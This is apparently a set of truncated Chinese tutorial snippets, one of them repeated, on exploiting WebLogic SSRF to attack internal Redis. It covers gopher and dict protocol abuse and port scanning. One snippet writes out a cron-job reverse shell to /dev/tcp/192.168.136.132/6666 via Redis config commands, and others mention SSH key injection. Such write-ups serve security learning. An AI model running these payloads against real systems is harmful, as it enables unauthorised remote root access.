扫描存活端口python SSRFX.py --url http://192.168.110.186:7001/uddiexplorer/SearchPublicRegistries.jsp --app weblogic --network 172.19.0.2 --typeportscan 三、redis反弹shell# Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是...
其实就是写入计划任务的那几个命令给他集成化到一个脚本里面,构成一个快捷写入计划任务反弹shell的脚本,现在就要想办法让目标(centos)执行这个脚本,来反弹shell到kali里面 这里最好用的方法就是通过抓取centos7的redis服务写入计划任务反弹shell的数据包,再通过http协议利用ssrf漏洞执行这个数据包的内容,即可达到效果 输入...
0x02 攻击内网Redis反弹shell 在Weblogic的SSRF中,有一个比较大的特点,就是虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。 第一步探测Redis我们已经完成了,那么第二部就是发送redis命令,将弹sh...
在开始讲攻击Redis之前,必须要理解Redis的客户端和服务端的通信方式,以及数据发送的格式,该目的的实现需要tcpdump的抓包功能。使用抓包软件来查看Redis客户端和Redis服务端的通信数据,找到语法结构后开始模拟客户端发送数据。 抓取redis通信 1、使用tcpdump来完成抓包,命令如下: tcpdump -i eth0 port 6379 -w redis....
(1)将反弹shell命令写到定时任务里,攻击机只需要开一个netcat端口即可。(2)写入ssh-keygen,进行ssh免密登录。一个个细细道来。(1)定时任务反弹shell基本要求:redis需要是以 root 权限运行,不然写不到 /var/spool/cron/ 目录下1.首先得知道 Linux 下的定时任务是个什么东西:Linux下设置定时任务命令为 crontab...
成功的获取了反弹shell。 端口探测 同样的利用dict协议我们也可以探测端口存活。 gopher 在利用ssrf攻击redis时利用gopher协议我们可以进行主从复制,shell的写入 我们先利用gopher写一些键值对。 127.0.0.1:6379> set key1 value1 OK 这个时候利用tcpdump进行抓取流经6379的流量。 相关命令:`[root@izbp1j0zu9bm2aus...
(2)dict:泄露安装软件版本信息,查看端口,操作内网redis服务等 (3)gopher:gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell (4)http/s:探测内网主机存活 ...
Centos7首先开启redis服务: 操作redis写计划任务反弹shell,在redis-cli中输入以下命令: set x "\n* * * * * /bin/bash -i > /dev/tcp/192.168.136.132/6666 0<&1 2>&1\n"config set dir /var/spool/cron/ # 根据实际系统版本路径会不相同config set dbfilename rootsave ...
1. kali监听21端口: 在bp中修改字段点击发送,将计划任务发送到redis数据库中: 反弹shell成功,获取到root权限: 文章知识点与官方知识档案匹配,可进一步学习相关知识
(2)dict:泄露安装软件版本信息,查看端口,操作内网redis服务等 (3)gopher:gopher支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell (4)http/s:探测内网主机存活 ...